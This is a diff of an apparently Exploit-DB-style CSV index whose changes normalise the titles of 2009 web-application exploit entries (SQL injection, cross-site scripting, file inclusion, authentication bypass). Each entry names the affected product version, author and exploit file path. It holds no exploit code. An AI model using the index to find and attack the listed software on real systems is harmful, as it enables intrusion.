8706,platforms/php/webapps/8706.pl,"PHPenpals 1.1 - (mail.php ID) SQL Injection",2009-05-15,Br0ly,php,webapps,0 -8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - (Authentication Bypass / Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0 -8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-15,YEnH4ckEr,php,webapps,0 +8707,platforms/php/webapps/8707.txt,"my-colex 1.4.2 - Authentication Bypass / Cross-Site Scripting / SQL Injection",2009-05-15,YEnH4ckEr,php,webapps,0 +8708,platforms/php/webapps/8708.txt,"my-gesuad 0.9.14 - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-05-15,YEnH4ckEr,php,webapps,0 8709,platforms/php/webapps/8709.txt,"Pc4Uploader 9.0 - Blind SQL Injection",2009-05-18,Qabandi,php,webapps,0 8710,platforms/php/webapps/8710.txt,"PHP Dir Submit - (Authentication Bypass) SQL Injection",2009-05-18,snakespc,php,webapps,0 8711,platforms/php/webapps/8711.txt,"Online Rental Property Script 5.0 - 'pid' Parameter SQL Injection",2009-05-18,"UnderTaker HaCkEr",php,webapps,0 @@ -21001,7 +21004,7 @@ id,file,description,date,author,platform,type,port 8734,platforms/asp/webapps/8734.txt,"Namad (IMenAfzar) 2.0.0.0 - Remote File Disclosure",2009-05-19,Securitylab.ir,asp,webapps,0 8735,platforms/php/webapps/8735.txt,"PAD Site Scripts 3.6 - Insecure Cookie Handling",2009-05-19,Mr.tro0oqy,php,webapps,0 8736,platforms/php/webapps/8736.pl,"Coppermine Photo Gallery 1.4.22 - Remote Exploit",2009-05-19,girex,php,webapps,0 -8737,platforms/php/webapps/8737.txt,"vidshare pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-19,snakespc,php,webapps,0 +8737,platforms/php/webapps/8737.txt,"vidshare pro - SQL Injection / Cross-Site Scripting",2009-05-19,snakespc,php,webapps,0 8738,platforms/php/webapps/8738.txt,"Dog Pedigree Online Database 1.0.1b - Multiple SQL Injections",2009-05-19,YEnH4ckEr,php,webapps,0 8739,platforms/php/webapps/8739.txt,"Dog Pedigree Online Database 1.0.1b - Insecure Cookie Handling",2009-05-19,YEnH4ckEr,php,webapps,0 8740,platforms/php/webapps/8740.pl,"Dog Pedigree Online Database 1.0.1b - Blind SQL Injection",2009-05-19,YEnH4ckEr,php,webapps,0 @@ -21017,7 +21020,7 @@ id,file,description,date,author,platform,type,port 8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - (forumid) Blind SQL Injection",2009-05-20,snakespc,php,webapps,0 8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Arbitrary Remove Projects/Tasks",2009-05-20,YEnH4ckEr,php,webapps,0 8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - (Authentication Bypass) SQL Injection",2009-05-21,Striker7,php,webapps,0 -8756,platforms/asp/webapps/8756.txt,"asp inline Corporate Calendar - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0 +8756,platforms/asp/webapps/8756.txt,"asp inline Corporate Calendar - SQL Injection / Cross-Site Scripting",2009-05-21,Bl@ckbe@rD,asp,webapps,0 8759,platforms/php/webapps/8759.txt,"Flash Quiz Beta 2 - Multiple SQL Injections",2009-05-21,YEnH4ckEr,php,webapps,0 8761,platforms/php/webapps/8761.txt,"Article Directory - (Authentication Bypass) SQL Injection",2009-05-21,Hakxer,php,webapps,0 8762,platforms/php/webapps/8762.txt,"Article Directory - 'page.php' Blind SQL Injection",2009-05-21,"ThE g0bL!N",php,webapps,0 @@ -21030,7 +21033,7 @@ id,file,description,date,author,platform,type,port 8774,platforms/php/webapps/8774.htm,"Mole Group Sky Hunter/Bus Ticket Scripts - Change Admin Password",2009-05-22,G4N0K,php,webapps,0 8775,platforms/php/webapps/8775.txt,"Mole Group Restaurant Directory Script 3.0 - Change Admin Password",2009-05-22,G4N0K,php,webapps,0 8776,platforms/php/webapps/8776.txt,"photovideotube 1.11 - Multiple Vulnerabilities",2009-05-22,Hakxer,php,webapps,0 -8778,platforms/php/webapps/8778.txt,"minitwitter 0.3-beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-05-26,YEnH4ckEr,php,webapps,0 +8778,platforms/php/webapps/8778.txt,"minitwitter 0.3-beta - SQL Injection / Cross-Site Scripting",2009-05-26,YEnH4ckEr,php,webapps,0 8779,platforms/php/webapps/8779.txt,"Joomla! Component Boy Scout Advancement 0.3 - 'id' SQL Injection",2009-05-26,YEnH4ckEr,php,webapps,0 8781,platforms/php/webapps/8781.txt,"Dokuwiki 2009-02-14 - Local File Inclusion",2009-05-26,girex,php,webapps,0 8784,platforms/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza 2.x - (vbplaza.php) Blind SQL Injection",2009-05-26,"Cold Zero",php,webapps,0 @@ -21060,8 +21063,8 @@ id,file,description,date,author,platform,type,port 8816,platforms/php/webapps/8816.txt,"SiteX 0.7.4.418 - (THEME_FOLDER) Local File Inclusion",2009-05-27,ahmadbady,php,webapps,0 8817,platforms/php/webapps/8817.txt,"Evernew Free Joke Script 1.2 - 'cat_id' SQL Injection",2009-05-27,taRentReXx,php,webapps,0 8818,platforms/php/webapps/8818.txt,"Impact Software AdPeeps 8.5d1 - Cross-Site Scripting / HTML Injection",2009-05-27,intern0t,php,webapps,0 -8819,platforms/php/webapps/8819.txt,"small pirate 2.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-05-29,YEnH4ckEr,php,webapps,0 -8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - (Cross-Site Scripting / SQL Injection / HTML Injection) Multiple Vulnerabilities",2009-05-29,intern0t,php,webapps,0 +8819,platforms/php/webapps/8819.txt,"small pirate 2.1 - Cross-Site Scripting / SQL Injection",2009-05-29,YEnH4ckEr,php,webapps,0 +8820,platforms/php/webapps/8820.txt,"amember 3.1.7 - Cross-Site Scripting / SQL Injection / HTML Injection",2009-05-29,intern0t,php,webapps,0 8821,platforms/php/webapps/8821.txt,"Joomla! Component JVideo 0.3.x - SQL Injection",2009-05-29,"Chip d3 bi0s",php,webapps,0 8823,platforms/php/webapps/8823.txt,"212Cafe WebBoard 2.90 Beta - Remote File Disclosure",2009-05-29,MrDoug,php,webapps,0 8825,platforms/php/webapps/8825.txt,"Zen Help Desk 2.1 - (Authentication Bypass) SQL Injection",2009-05-29,TiGeR-Dz,php,webapps,0 @@ -21072,7 +21075,7 @@ id,file,description,date,author,platform,type,port 8831,platforms/php/webapps/8831.txt,"Traidnt Up 2.0 - (Authentication Bypass / Cookie) SQL Injection",2009-05-29,Qabandi,php,webapps,0 8834,platforms/php/webapps/8834.pl,"RadCLASSIFIEDS Gold 2 - (seller) SQL Injection",2009-06-01,Br0ly,php,webapps,0 8836,platforms/php/webapps/8836.txt,"OCS Inventory NG 1.02 - Multiple SQL Injections",2009-06-01,"Nico Leidecker",php,webapps,0 -8838,platforms/php/webapps/8838.txt,"elitecms 1.01 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-01,xeno_hive,php,webapps,0 +8838,platforms/php/webapps/8838.txt,"elitecms 1.01 - SQL Injection / Cross-Site Scripting",2009-06-01,xeno_hive,php,webapps,0 8839,platforms/php/webapps/8839.txt,"Open-school 1.0 - 'id' SQL Injection",2009-06-01,OzX,php,webapps,0 8840,platforms/php/webapps/8840.txt,"Escon SupportPortal Pro 3.0 - (tid) Blind SQL Injection",2009-06-01,OzX,php,webapps,0 8841,platforms/php/webapps/8841.txt,"unclassified NewsBoard 1.6.4 - Multiple Vulnerabilities",2009-06-01,girex,php,webapps,0 @@ -21087,9 +21090,9 @@ id,file,description,date,author,platform,type,port 8853,platforms/php/webapps/8853.txt,"Online Grades & Attendance 3.2.6 - Multiple Local File Inclusion",2009-06-02,YEnH4ckEr,php,webapps,0 8854,platforms/php/webapps/8854.pl,"Online Grades & Attendance 3.2.6 - Blind SQL Injection",2009-06-02,YEnH4ckEr,php,webapps,0 8855,platforms/php/webapps/8855.txt,"Alstrasoft Article Manager Pro - Arbitrary File Upload",2009-06-02,ZoRLu,php,webapps,0 -8856,platforms/php/webapps/8856.txt,"flashlight free edition - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-06-02,K4m1k451,php,webapps,0 +8856,platforms/php/webapps/8856.txt,"flashlight free edition - Local File Inclusion / SQL Injection",2009-06-02,K4m1k451,php,webapps,0 8857,platforms/php/webapps/8857.txt,"WebCal - 'webCal3_detail.asp event_id' SQL Injection",2009-06-02,Bl@ckbe@rD,php,webapps,0 -8858,platforms/php/webapps/8858.txt,"propertymax pro free - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-02,SirGod,php,webapps,0 +8858,platforms/php/webapps/8858.txt,"propertymax pro free - SQL Injection / Cross-Site Scripting",2009-06-02,SirGod,php,webapps,0 8859,platforms/asp/webapps/8859.txt,"WebEyes Guest Book 3 - 'yorum.asp mesajid' SQL Injection",2009-06-02,Bl@ckbe@rD,asp,webapps,0 8860,platforms/php/webapps/8860.txt,"Podcast Generator 1.2 - 'GLOBALS[]' Multiple Vulnerabilities",2009-06-02,StAkeR,php,webapps,0 8864,platforms/php/webapps/8864.txt,"My Mini Bill - (orderid) SQL Injection",2009-06-03,"ThE g0bL!N",php,webapps,0 @@ -21120,7 +21123,7 @@ id,file,description,date,author,platform,type,port 8895,platforms/cgi/webapps/8895.txt,"Interlogy Profile Manager Basic - Insecure Cookie Handling",2009-06-08,ZoRLu,cgi,webapps,0 8898,platforms/php/webapps/8898.txt,"Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion",2009-06-08,"Chip d3 bi0s",php,webapps,0 8900,platforms/php/webapps/8900.txt,"Frontis 3.9.01.24 - (source_class) SQL Injection",2009-06-08,snakespc,php,webapps,0 -8901,platforms/php/webapps/8901.txt,"virtue news - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-08,snakespc,php,webapps,0 +8901,platforms/php/webapps/8901.txt,"virtue news - SQL Injection / Cross-Site Scripting",2009-06-08,snakespc,php,webapps,0 8902,platforms/php/webapps/8902.htm,"Grestul 1.2 - Remote Add Administrator Account Exploit",2009-06-08,"ThE g0bL!N",php,webapps,0 8903,platforms/php/webapps/8903.txt,"DM FileManager 3.9.2 - Insecure Cookie Handling",2009-06-08,"ThE g0bL!N",php,webapps,0 8904,platforms/php/webapps/8904.txt,"Automated link exchange portal 1.3 - Multiple Vulnerabilities",2009-06-08,TiGeR-Dz,php,webapps,0 @@ -21140,30 +21143,30 @@ id,file,description,date,author,platform,type,port 8923,platforms/php/webapps/8923.txt,"LightNEasy sql/no-db 2.2.x - System Config Disclosure",2009-06-10,StAkeR,php,webapps,0 8924,platforms/php/webapps/8924.txt,"School Data Navigator - (page) Local / Remote File Inclusion",2009-06-10,Br0ly,php,webapps,0 8925,platforms/php/webapps/8925.txt,"Desi Short URL Script - (Authentication Bypass) Insecure Cookie Handling",2009-06-10,N@bilX,php,webapps,0 -8926,platforms/php/webapps/8926.txt,"mrcgiguy freeticket - (Cookie Handling / SQL Injection) Multiple Vulnerabilities",2009-06-10,"ThE g0bL!N",php,webapps,0 +8926,platforms/php/webapps/8926.txt,"mrcgiguy freeticket - Cookie Handling / SQL Injection",2009-06-10,"ThE g0bL!N",php,webapps,0 8927,platforms/php/webapps/8927.pl,"Open Biller 0.1 - 'Username' Blind SQL Injection",2009-06-10,YEnH4ckEr,php,webapps,0 8928,platforms/php/webapps/8928.txt,"PHPWebThings 1.5.2 - (help.php module) Local File Inclusion",2009-06-11,Br0ly,php,webapps,0 8929,platforms/php/webapps/8929.txt,"Splog 1.2 Beta - Multiple SQL Injections",2009-06-11,YEnH4ckEr,php,webapps,0 8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 - (deleteTorrent) Delete Arbitrary File",2009-06-11,Br0ly,php,webapps,0 -8932,platforms/php/webapps/8932.txt,"yogurt 0.3 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-06-11,Br0ly,php,webapps,0 +8932,platforms/php/webapps/8932.txt,"yogurt 0.3 - Cross-Site Scripting / SQL Injection",2009-06-11,Br0ly,php,webapps,0 8933,platforms/php/webapps/8933.php,"Sniggabo CMS - 'article.php id' SQL Injection",2009-06-11,Lidloses_Auge,php,webapps,0 8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 - (Authentication Bypass) SQL Injection",2009-06-12,ByALBAYX,php,webapps,0 8936,platforms/php/webapps/8936.txt,"4Images 1.7.7 - Filter Bypass HTML Injection / Cross-Site Scripting",2009-06-12,Qabandi,php,webapps,0 -8937,platforms/php/webapps/8937.txt,"campus virtual-lms - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-06-12,Yasión,php,webapps,0 +8937,platforms/php/webapps/8937.txt,"campus virtual-lms - Cross-Site Scripting / SQL Injection",2009-06-12,Yasión,php,webapps,0 8939,platforms/php/webapps/8939.pl,"phpWebThings 1.5.2 - MD5 Hash Retrieve/File Disclosure",2009-06-12,StAkeR,php,webapps,0 8941,platforms/php/webapps/8941.txt,"pivot 1.40.4-7 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 8942,platforms/php/webapps/8942.txt,"tbdev 01-01-2008 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 -8943,platforms/php/webapps/8943.txt,"translucid 1.75 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 +8943,platforms/php/webapps/8943.txt,"TransLucid 1.75 - Multiple Vulnerabilities",2009-06-12,intern0t,php,webapps,0 8944,platforms/php/webapps/8944.txt,"Uebimiau Web-Mail 3.2.0-1.8 - Remote File / Overwrite",2009-06-12,GoLd_M,php,webapps,0 8946,platforms/php/webapps/8946.txt,"Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion",2009-06-15,ByALBAYX,php,webapps,0 -8947,platforms/php/webapps/8947.txt,"impleo music Collection 2.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 +8947,platforms/php/webapps/8947.txt,"impleo music Collection 2.0 - SQL Injection / Cross-Site Scripting",2009-06-15,SirGod,php,webapps,0 8948,platforms/php/webapps/8948.txt,"Mundi Mail 0.8.2 - (top) Remote File Inclusion",2009-06-15,Br0ly,php,webapps,0 8949,platforms/php/webapps/8949.txt,"SugarCRM 5.2.0e - Remote Code Execution",2009-06-15,USH,php,webapps,0 8950,platforms/php/webapps/8950.txt,"formmail 1.92 - Multiple Vulnerabilities",2009-06-15,USH,php,webapps,0 8951,platforms/php/webapps/8951.php,"DB Top Sites 1.0 - Remote Command Execution",2009-06-15,SirGod,php,webapps,0 8952,platforms/php/webapps/8952.txt,"DB Top Sites 1.0 - (index.php u) Local File Inclusion",2009-06-15,SirGod,php,webapps,0 8953,platforms/php/webapps/8953.txt,"elvin bts 1.2.0 - Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 -8954,platforms/php/webapps/8954.txt,"adaptweb 0.9.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 +8954,platforms/php/webapps/8954.txt,"adaptweb 0.9.2 - Local File Inclusion / SQL Injection",2009-06-15,SirGod,php,webapps,0 8956,platforms/php/webapps/8956.htm,"Evernew Free Joke Script 1.2 - Remote Change Password Exploit",2009-06-15,Hakxer,php,webapps,0 8958,platforms/php/webapps/8958.txt,"torrenttrader classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0 8959,platforms/php/webapps/8959.pl,"Joomla! Component com_iJoomla_rss - Blind SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0 @@ -21180,12 +21183,12 @@ id,file,description,date,author,platform,type,port 8979,platforms/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusion",2009-06-17,YEnH4ckEr,php,webapps,0 8980,platforms/php/webapps/8980.py,"FretsWeb 1.2 - (name) Blind SQL Injection",2009-06-17,YEnH4ckEr,php,webapps,0 8981,platforms/php/webapps/8981.txt,"PHPortal 1.0 - Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0 -8984,platforms/php/webapps/8984.txt,"CMS buzz - (Cross-Site Scripting / Password Change/HTML Injection) Multiple Vulnerabilities",2009-06-18,"ThE g0bL!N",php,webapps,0 +8984,platforms/php/webapps/8984.txt,"CMS buzz - Cross-Site Scripting / Password Change / HTML Injection",2009-06-18,"ThE g0bL!N",php,webapps,0 8987,platforms/cgi/webapps/8987.txt,"MIDAS 1.43 - (Authentication Bypass) Insecure Cookie Handling",2009-06-22,HxH,cgi,webapps,0 8988,platforms/php/webapps/8988.txt,"pc4 Uploader 10.0 - Remote File Disclosure",2009-06-22,Qabandi,php,webapps,0 8990,platforms/php/webapps/8990.txt,"phpDatingClub 3.7 - SQL Injection / Cross-Site Scripting Injection",2009-06-22,"ThE g0bL!N",php,webapps,0 8992,platforms/php/webapps/8992.php,"phpMyAdmin - pmaPWN! Code Injection Remote Code Execution Scanner & Exploit Tool",2009-06-22,"Hacking Expose!",php,webapps,0 -8993,platforms/php/webapps/8993.txt,"elgg - (Cross-Site Scripting / Cross-Site Request Forgery/Change Password) Multiple Vulnerabilities",2009-06-22,lorddemon,php,webapps,0 +8993,platforms/php/webapps/8993.txt,"elgg - Cross-Site Scripting / Cross-Site Request Forgery / Change Password",2009-06-22,lorddemon,php,webapps,0 8994,platforms/php/webapps/8994.txt,"AWScripts Gallery Search Engine 1.x - Insecure Cookie",2009-06-22,TiGeR-Dz,php,webapps,0 8995,platforms/php/webapps/8995.txt,"Campsite 3.3.0 RC1 - Multiple Remote File Inclusion",2009-06-22,CraCkEr,php,webapps,0 8996,platforms/php/webapps/8996.txt,"Gravy Media Photo Host 1.0.8 - Local File Disclosure",2009-06-22,Lo$er,php,webapps,0 @@ -21196,11 +21199,11 @@ id,file,description,date,author,platform,type,port 9001,platforms/php/webapps/9001.php,"MyBB 1.4.6 - Remote Code Execution",2009-06-22,The:Paradox,php,webapps,0 9004,platforms/php/webapps/9004.txt,"Zen Cart 1.3.8 - Remote Code Execution",2009-06-23,BlackH,php,webapps,0 9005,platforms/php/webapps/9005.py,"Zen Cart 1.3.8 - SQL Execution Exploit",2009-06-23,BlackH,php,webapps,0 -9008,platforms/php/webapps/9008.txt,"phpCollegeExchange 0.1.5c - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-23,CraCkEr,php,webapps,0 +9008,platforms/php/webapps/9008.txt,"phpCollegeExchange 0.1.5c - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting",2009-06-23,CraCkEr,php,webapps,0 9009,platforms/php/webapps/9009.txt,"BASE 1.2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-06-24,"Tim Medin",php,webapps,0 9010,platforms/php/webapps/9010.txt,"Glossword 1.8.11 - (index.php x) Local File Inclusion",2009-06-24,t0fx,php,webapps,0 9011,platforms/php/webapps/9011.txt,"Joomla! Component com_pinboard - Arbitrary File Upload",2009-06-24,ViRuSMaN,php,webapps,0 -9012,platforms/php/webapps/9012.txt,"Tribiq CMS 5.0.12c - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2009-06-24,CraCkEr,php,webapps,0 +9012,platforms/php/webapps/9012.txt,"Tribiq CMS 5.0.12c - Cross-Site Scripting / Local File Inclusion",2009-06-24,CraCkEr,php,webapps,0 9014,platforms/php/webapps/9014.txt,"PHPEcho CMS 2.0-rc3 - (forum) Cross-Site Scripting Cookie Stealing / Blind",2009-06-24,JosS,php,webapps,0 9015,platforms/php/webapps/9015.txt,"LightOpenCMS 0.1 - (smarty.php cwd) Local File Inclusion",2009-06-24,JosS,php,webapps,0 9016,platforms/php/webapps/9016.txt,"Joomla! Component com_amocourse - 'catid' SQL Injection",2009-06-24,"Chip d3 bi0s",php,webapps,0 @@ -21209,7 +21212,7 @@ id,file,description,date,author,platform,type,port 9019,platforms/php/webapps/9019.txt,"AlumniServer 1.0.1 - (Authentication Bypass) SQL Injection",2009-06-25,YEnH4ckEr,php,webapps,0 9020,platforms/php/webapps/9020.py,"AlumniServer 1.0.1 - (resetpwemail) Blind SQL Injection",2009-06-25,YEnH4ckEr,php,webapps,0 9021,platforms/php/webapps/9021.txt,"MD-Pro 1.083.x - Survey Module (pollID) Blind SQL Injection",2009-06-25,XaDoS,php,webapps,0 -9022,platforms/php/webapps/9022.txt,"Virtue Online Test Generator - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-06-26,HxH,php,webapps,0 +9022,platforms/php/webapps/9022.txt,"Virtue Online Test Generator - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-06-26,HxH,php,webapps,0 9023,platforms/php/webapps/9023.txt,"PHP-Address Book 4.0.x - Multiple SQL Injections",2009-06-26,YEnH4ckEr,php,webapps,0 9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 - (Authentication Bypass) SQL Injection",2009-06-26,"ThE g0bL!N",php,webapps,0 9025,platforms/php/webapps/9025.txt,"Mega File Manager 1.0 - 'index.php' Local File Inclusion",2009-06-26,SirGod,php,webapps,0 @@ -21255,7 +21258,7 @@ id,file,description,date,author,platform,type,port 9088,platforms/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps,0 9089,platforms/php/webapps/9089.txt,"ClearContent - 'image.php url' Remote File Inclusion / Local File Inclusion",2009-07-09,MizoZ,php,webapps,0 9091,platforms/php/webapps/9091.php,"Mlffat 2.2 - Blind SQL Injection",2009-07-09,Qabandi,php,webapps,0 -9092,platforms/php/webapps/9092.txt,"webasyst shop-script - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-09,Vrs-hCk,php,webapps,0 +9092,platforms/php/webapps/9092.txt,"webasyst shop-script - Blind SQL Injection / Cross-Site Scripting",2009-07-09,Vrs-hCk,php,webapps,0 9094,platforms/php/webapps/9094.txt,"EasyVillaRentalSite - 'id' SQL Injection",2009-07-09,BazOka-HaCkEr,php,webapps,0 9095,platforms/php/webapps/9095.txt,"TalkBack 2.3.14 - Multiple Vulnerabilities",2009-07-09,JIKO,php,webapps,0 9098,platforms/php/webapps/9098.txt,"Siteframe CMS 3.2.x - SQL Injection / phpinfo()",2009-07-09,NoGe,php,webapps,0 @@ -21269,14 +21272,14 @@ id,file,description,date,author,platform,type,port 9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0 9112,platforms/php/webapps/9112.txt,"Joomla! Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0 9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,php,webapps,0 -9118,platforms/php/webapps/9118.txt,"ebay clone 2009 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities",2009-07-10,Moudi,php,webapps,0 +9118,platforms/php/webapps/9118.txt,"ebay clone 2009 - Cross-Site Scripting / Blind SQL Injection",2009-07-10,Moudi,php,webapps,0 9119,platforms/php/webapps/9119.txt,"LionWiki - 'index.php' Local File Inclusion",2009-07-10,MoDaMeR,php,webapps,0 9121,platforms/php/webapps/9121.php,"Morcego CMS 1.7.6 - Blind SQL Injection",2009-07-10,darkjoker,php,webapps,0 9122,platforms/php/webapps/9122.txt,"Opial 1.0 - Arbitrary File Upload / Cross-Site Scripting / SQL Injection",2009-07-11,LMaster,php,webapps,0 9125,platforms/php/webapps/9125.txt,"Ebay Clone 2009 - Multiple SQL Injections",2009-07-11,MizoZ,php,webapps,0 9126,platforms/php/webapps/9126.txt,"Joomla! Component com_category - 'catid' SQL Injection",2009-07-11,Prince_Pwn3r,php,webapps,0 9127,platforms/php/webapps/9127.txt,"d.net CMS - Arbitrary Reinstall/Blind SQL Injection",2009-07-11,darkjoker,php,webapps,0 -9129,platforms/php/webapps/9129.txt,"censura 1.16.04 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-12,Vrs-hCk,php,webapps,0 +9129,platforms/php/webapps/9129.txt,"censura 1.16.04 - Blind SQL Injection / Cross-Site Scripting",2009-07-12,Vrs-hCk,php,webapps,0 9130,platforms/php/webapps/9130.txt,"PHP AdminPanel Free 1.0.5 - Remote File Disclosure",2009-07-12,"Khashayar Fereidani",php,webapps,0 9132,platforms/php/webapps/9132.py,"RunCMS 1.6.3 - Remote Shell Injection",2009-07-13,StAkeR,php,webapps,0 9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - products.php SQL Injection",2009-07-13,Affix,php,webapps,0 @@ -21303,7 +21306,7 @@ id,file,description,date,author,platform,type,port 9182,platforms/php/webapps/9182.txt,"AJOX Poll - 'managepoll.php' Authentication Bypass",2009-07-17,SirGod,php,webapps,0 9183,platforms/php/webapps/9183.txt,"Battle Blog 1.25 - Authentication Bypass / SQL Injection / HTML Injection",2009-07-17,$qL_DoCt0r,php,webapps,0 9184,platforms/php/webapps/9184.txt,"Ger Versluis 2000 5.5 24 - SITE_fiche.php SQL Injection",2009-07-17,DeCo017,php,webapps,0 -9185,platforms/php/webapps/9185.txt,"good/bad vote - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 +9185,platforms/php/webapps/9185.txt,"good/bad vote - Cross-Site Scripting / Local File Inclusion",2009-07-17,Moudi,php,webapps,0 9187,platforms/php/webapps/9187.txt,"Joomla! Component Jobline 1.3.1 - Blind SQL Injection",2009-07-17,ManhLuat93,php,webapps,0 9193,platforms/php/webapps/9193.pl,"WebVision 2.1 - (news.php n) SQL Injection",2009-07-17,Mr.tro0oqy,php,webapps,0 9194,platforms/php/webapps/9194.txt,"radbids gold 4.0 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 @@ -21312,7 +21315,7 @@ id,file,description,date,author,platform,type,port 9202,platforms/php/webapps/9202.txt,"Silentum Guestbook 2.0.2 - (silentum_Guestbook.php) SQL Injection",2009-07-20,Bgh7,php,webapps,0 9203,platforms/php/webapps/9203.txt,"Netrix CMS 1.0 - Authentication Bypass",2009-07-20,Mr.tro0oqy,php,webapps,0 9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 - 'lang' Remote File Inclusion",2009-07-20,NoGe,php,webapps,0 -9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 - (SQL Injection / Cross-Site Scripting / shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0 +9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 - SQL Injection / Cross-Site Scripting / shell",2009-07-20,SirGod,php,webapps,0 9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS - SQL Injection / Blind SQL Injection",2009-07-20,"599eme Man",php,webapps,0 9217,platforms/php/webapps/9217.txt,"E-Xoopport 3.1 Module MyAnnonces - (lid) SQL Injection",2009-07-20,Vrs-hCk,php,webapps,0 9219,platforms/php/webapps/9219.txt,"powerUpload 2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-07-20,InjEctOr5,php,webapps,0 @@ -21325,7 +21328,7 @@ id,file,description,date,author,platform,type,port 9237,platforms/php/webapps/9237.txt,"AWCM 2.1 - Local File Inclusion / Authentication Bypass",2009-07-23,SwEET-DeViL,php,webapps,0 9238,platforms/php/webapps/9238.txt,"Joomla! Component com_Joomlaoads - (packageId) SQL Injection",2009-07-23,Mr.tro0oqy,php,webapps,0 9239,platforms/php/webapps/9239.txt,"PHP Melody 1.5.3 - Arbitrary File Upload Injection",2009-07-23,"Chip d3 bi0s",php,webapps,0 -9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-24,Moudi,php,webapps,0 +9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - SQL Injection / Cross-Site Scripting",2009-07-24,Moudi,php,webapps,0 9244,platforms/php/webapps/9244.txt,"Joomla! Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0 9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0 9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - (Authentication Bypass) SQL Injection",2009-07-24,SwEET-DeViL,php,webapps,0 @@ -21338,12 +21341,12 @@ id,file,description,date,author,platform,type,port 9256,platforms/php/webapps/9256.txt,"Scripteen Free Image Hosting Script 2.3 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 9257,platforms/php/webapps/9257.php,"Pixaria Gallery 2.3.5 - (file) Remote File Disclosure",2009-07-24,Qabandi,php,webapps,0 9258,platforms/php/webapps/9258.txt,"Joomla! Component Almond Classifieds com_aclassf 7.5 - Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 -9259,platforms/php/webapps/9259.txt,"almond Classifieds ads - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 -9260,platforms/php/webapps/9260.txt,"skadate dating - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 -9261,platforms/php/webapps/9261.txt,"XOOPS Celepar Module Qas - (Blind SQL Injection / Cross-Site Scripting) Multiple 